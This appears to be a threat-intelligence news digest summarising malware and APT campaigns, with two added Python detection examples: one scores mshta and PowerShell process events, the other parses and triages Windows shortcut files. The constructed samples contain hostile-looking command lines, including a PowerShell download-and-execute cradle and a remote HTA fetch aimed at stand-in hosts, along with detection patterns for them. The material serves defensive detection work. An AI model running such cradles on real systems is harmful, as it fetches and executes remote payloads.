Cybercriminals are increasingly leveraging PowerShell-based loaders and proxy execution through mshta.exe to deploy the stealthy Remcos RAT, which operates entirely in memory to evade traditional defenses. This malware uses advanced persistence, evasion, and data theft techniques, highlighting the importance of behavioral detection and robust endpoint protection. #Remcos #PowerShellLoader #MSHTA #Rmc7SY4AX
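The behavioral detection the entry above calls for, shown as an added example that is not code from the original page or from any vendor product: a small Python rule set run over constructed Sysmon-style process-creation records. The sample events, rule names and alert threshold are assumptions chosen for illustration; the traits they look for (mshta fetching a remote HTA or spawning PowerShell, encoded or hidden PowerShell, download cradles, reflective assembly loading) are generic loader behaviors, not indicators lifted from a specific Remcos campaign.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1
# (image, parent image, command line). Illustrative only; not telemetry
# from any real Remcos incident.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r"mshta.exe https://example.invalid/update.hta"},
    {"id": 2, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe -c "[System.Reflection.Assembly]::Load($buf).EntryPoint.Invoke($null,$null)"'},
    {"id": 4, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta.exe "C:\Users\alice\Documents\report.hta"'},
    {"id": 5, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Hits that justify an alert on their own; everything else needs a second hit.
HIGH_CONFIDENCE = {"mshta_proxy_execution", "powershell_reflective_load"}

# PowerShell command-line traits typical of in-memory loaders (input is case-folded).
PS_RULES = [
    ("powershell_encoded_command", re.compile(r"\s-e(c|nc(odedcommand)?)?\b")),
    ("powershell_hidden_window", re.compile(r"\s-w(indowstyle)?\s+hidden")),
    ("powershell_policy_bypass", re.compile(r"\s-e(p|xec|xecutionpolicy)\s+bypass")),
    ("powershell_download_cradle",
     re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b")),
    ("powershell_reflective_load",
     re.compile(r"\[(system\.)?reflection\.assembly\]::load|frombase64string|virtualalloc")),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list[str]:
    """Return the names of every behavioral rule the event matches."""
    hits = []
    image, parent = basename(event["image"]), basename(event["parent"])
    cmd = event["cmdline"].lower()
    if image == "mshta.exe":
        # mshta pulling an HTA from a URL, or running inline javascript:/vbscript:
        if re.search(r"https?://|\b(javascript|vbscript):", cmd):
            hits.append("mshta_remote_or_inline_payload")
        if parent in OFFICE_APPS:
            hits.append("mshta_spawned_by_office")
    # Proxy execution: mshta handing off to a script host or other LOLBin.
    if image in SCRIPT_HOSTS and parent == "mshta.exe":
        hits.append("mshta_proxy_execution")
    if image in ("powershell.exe", "pwsh.exe"):
        hits.extend(name for name, rx in PS_RULES if rx.search(cmd))
    return hits


def detect(events: list[dict]) -> dict[int, list[str]]:
    """Map event id -> matched rules, for events with at least one hit."""
    results = {}
    for ev in events:
        hits = evaluate(ev)
        if hits:
            results[ev["id"]] = hits
    return results


def alerts(events: list[dict]) -> list[int]:
    """Ids that cross the alert bar: two weak hits, or one high-confidence hit."""
    return [eid for eid, hits in detect(events).items()
            if len(hits) >= 2 or HIGH_CONFIDENCE.intersection(hits)]


if __name__ == "__main__":
    flagged = alerts(SAMPLE_EVENTS)
    for eid, hits in detect(SAMPLE_EVENTS).items():
        print(eid, "ALERT" if eid in flagged else "weak", hits)
```

Event 4 (a local .hta opened from Explorer) and event 5 (a scheduled script) produce no hits, which is the point of keying on parent-child relationships and command-line traits rather than on mshta.exe or powershell.exe alone: both binaries are legitimate, so the rule has to describe how they are abused, not that they ran.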
Tag: EDR

Aquatic Panda is a Chinese state-sponsored cyberespionage group linked to the contractor i-Soon, focused on long-term intelligence gathering and surveillance of government, NGOs, academic, and ideological targets worldwide. Utilizing advanced modular malware like ShadowPad and stealthy techniques, the group operates within China’s broader cyber network alongside entities such as Winnti, driven by objectives of state surveillance and influence. #AquaticPanda #ChineseAPT #Cyberespionage #ShadowPad #iSoon #Winnti #MSS

Ivanti Endpoint Manager Mobile (EPMM) is affected by two vulnerabilities, CVE-2025-4427 (an authentication bypass) and CVE-2025-4428 (a remote code execution flaw), that chain together to give unauthenticated remote code execution. Both are being actively exploited in the wild; the chain is critical even though neither flaw carries a critical CVSS score on its own. #IvantiEPMM #RCE #Vulnerabilities #Cybersecurity

This article details a targeted ransomware attack by the 3AM group that used email bombing followed by Microsoft Teams vishing to obtain remote access. The attackers deployed a backdoor running inside a QEMU virtual machine, which kept it out of sight of endpoint protections, stole data, and attempted to encrypt systems but largely failed because of multifactor authentication and Sophos XDR. #3AMRansomware #Vishing #QEMUBackdoor #SophosXDR #MultifactorAuthentication

Nitrogen is a sophisticated ransomware strain that targets the financial, manufacturing, and technology sectors across North America and the UK, employing advanced evasion and persistence tactics. Experts warn that its evolving methods pose a significant threat to organizations, emphasizing the importance of threat intelligence and real-time analysis tools like ANY.RUN. #NitrogenRansomware…

PupkinStealer is a newly discovered .NET-based information stealer that harvests browser passwords, application session tokens, and files and exfiltrates them through Telegram’s Bot API. Attributed to Russian-speaking cybercriminals, it targets Windows users indiscriminately and is built for fast, one-shot data theft: it installs no persistence mechanism. #PupkinStealer #InfoStealer #Telegram #WindowsMalware #Cybercrime

SideWinder APT has launched a sophisticated cyber espionage campaign targeting government institutions in Sri Lanka, Bangladesh, and Pakistan by exploiting legacy Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882. The attackers use geofenced spear phishing, multistage loaders, and DLL sideloading to deliver StealerBot, a credential stealer designed for persistent access and data exfiltration. #SideWinder #APT #CVE2017-0199 #CVE2017-11882 #StealerBot #CyberEspionage #SriLanka #Bangladesh #Pakistan

Chinese nation-state APT groups exploited an unauthenticated file upload vulnerability (CVE-2025-31324) in SAP NetWeaver Visual Composer to gain persistent remote access to critical infrastructure networks globally. This wide-ranging campaign targeted essential services and government entities across multiple countries, using sophisticated webshells and multi-stage malware to maintain stealthy control and enable espionage. #APT #SAPNetWeaver #CVE202531324 #China #CriticalInfrastructure #Webshell #Malware

DTEX has updated its Insider Threat Advisory on North Korean (DPRK) IT workers, describing the evolved tactics they use to infiltrate organizations worldwide as remote employees and evade detection, together with the behavioral and technical indicators that expose them. These operations affect corporate insider threat detection, remote access infrastructure, and recruitment processes worldwide. #DPRK #InsiderThreat #RemoteAccess

VanHelsing ransomware is a high-severity threat to Microsoft Windows systems: it encrypts files and demands a ransom for decryption. The family has been seen using more than one extension for encrypted files and maintains active data leak sites to pressure victims, significantly impacting affected organizations. #MicrosoftWindows #VanHelsing

A recent leak of the LockBit ransomware group’s internal database has exposed detailed information about their operations, affiliates, targets, and payment methods. This breach could significantly impact the group’s future activities and law enforcement efforts. Affected: LockBit ransomware group, victim organizations, cybersecurity and law enforcement agencies…

LeakedData, emerging in December 2024, is the operational front of the Silent Ransom Group, a Conti ransomware offshoot that shifted from ransomware encryption to targeted data extortion using social engineering and legitimate remote management tools. The group primarily targets U.S.-based law firms, insurance providers, and financial services companies to maximize extortion leverage by threatening data leaks. #SilentRansomGroup #LeakedData #ContiRansomware

APT37 ran a spear phishing campaign disguised as invitations to South Korean national security events, delivering malicious LNK files via Dropbox that execute the fileless RoKRAT malware. The campaign used trusted cloud services for command and control (C2), which complicates detection and strains endpoint security defenses. #APT37 #RoKRAT #Dropbox #EndpointSecurity
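A triage step for the LNK lure described above, added here as an example and not code from the original page or from any published analysis of the campaign: a minimal MS-SHLLINK parser that pulls the target, working directory and arguments out of a shortcut, followed by heuristics that flag the loader pattern (a shell or script host as target, a hidden or minimized window, a URL or download cradle in the arguments). The two shortcuts are constructed inside the block; their file names, the example.invalid URL and the indicator list are assumptions, and nothing is taken from an actual RoKRAT sample.

```python
import re
import struct

# Shell Link (.lnk) header constants from MS-SHLLINK.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData sections in file order, keyed by their LinkFlags bit.
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]
SW_SHOWMINNOACTIVE = 7  # ShowCommand value lures use to keep the console window minimized


def build_lnk(strings: dict, show_command: int = 1) -> bytes:
    """Build a minimal unicode .lnk consisting of the header plus StringData sections."""
    flags = IS_UNICODE
    body = b""
    for bit, key in STRING_FIELDS:
        if key in strings:
            flags |= bit
            body += struct.pack("<H", len(strings[key])) + strings[key].encode("utf-16-le")
    # HeaderSize, CLSID, LinkFlags, FileAttributes, three FILETIMEs, FileSize,
    # IconIndex, ShowCommand, HotKey, Reserved1, Reserved2, Reserved3
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack(
        "<IIQQQIIIHHII", flags, 0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + body


def parse_lnk(data: bytes) -> dict:
    """Extract ShowCommand and the StringData fields from a .lnk file."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    out = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:   # IDListSize (2 bytes) followed by the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:             # LinkInfoSize includes itself
        off += struct.unpack_from("<I", data, off)[0]
    for bit, key in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
            off += 2
            if flags & IS_UNICODE:
                out[key] = data[off:off + 2 * count].decode("utf-16-le")
                off += 2 * count
            else:
                out[key] = data[off:off + count].decode("cp1252")
                off += count
    return out


# Heuristics for loader-style shortcuts (assumed list, matched case-insensitively).
INDICATORS = [
    ("shell_or_script_host",
     r"\b(cmd|powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32)(\.exe)?\b"),
    ("hidden_window_switch", r"-w(indowstyle)?\s+hidden"),
    ("encoded_command", r"\s-e(c|nc(odedcommand)?)?\b"),
    ("url_in_arguments", r"https?://"),
    ("download_or_eval_cradle",
     r"downloadstring|downloadfile|frombase64string|invoke-expression|\biex\b"),
]


def triage(link: dict) -> list[str]:
    text = " ".join(link.get(k, "") for k in ("relative_path", "working_dir", "arguments"))
    reasons = [name for name, rx in INDICATORS if re.search(rx, text, re.I)]
    if link["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("minimized_window")
    return reasons


# Constructed samples: a loader-style lure and a benign application shortcut.
SAMPLES = {
    "invitation.pdf.lnk": build_lnk({
        "relative_path": r"..\..\..\Windows\System32\cmd.exe",
        "arguments": '/c powershell -w hidden -ep bypass -c "IEX (New-Object Net.WebClient)'
                     ".DownloadString('https://example.invalid/stage2')\"",
        "icon_location": r"%SystemRoot%\System32\shell32.dll"}, SW_SHOWMINNOACTIVE),
    "notepad++.lnk": build_lnk({
        "relative_path": r"..\..\Program Files\Notepad++\notepad++.exe",
        "working_dir": r"C:\Program Files\Notepad++"}),
}


def triage_all(samples: dict) -> dict:
    return {name: triage(parse_lnk(blob)) for name, blob in samples.items()}


if __name__ == "__main__":
    for name, reasons in triage_all(SAMPLES).items():
        print(name, "SUSPICIOUS" if reasons else "clean", reasons)
```

Real lures usually also carry a LinkTargetIDList and LinkInfo block; the parser skips both by their declared sizes, so it reads the same StringData fields from those files. The icon path pointing at shell32.dll is what makes the shortcut look like a document in Explorer, which is why the triage looks at the target and arguments rather than the icon or the displayed name.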

Windows’ Ancillary Function Driver (AFD, afd.sys) is the kernel component beneath Winsock sockets, but until recently no comprehensive public definitions of its interface existed. New research and published definitions expose detailed per-socket information at the kernel level, improving forensic and troubleshooting work on AFD sockets. #Windows #AncillaryFunctionDriver #AFD #SystemInformer

Ransomware has become a highly advanced and coordinated threat, exploiting legitimate IT tools and innovative business models like RaaS to increase attack frequency and reach. Building a comprehensive backup and recovery strategy is essential for organizations to withstand and quickly recover from such attacks. Affected: Organizations, IT systems, backup infrastructure…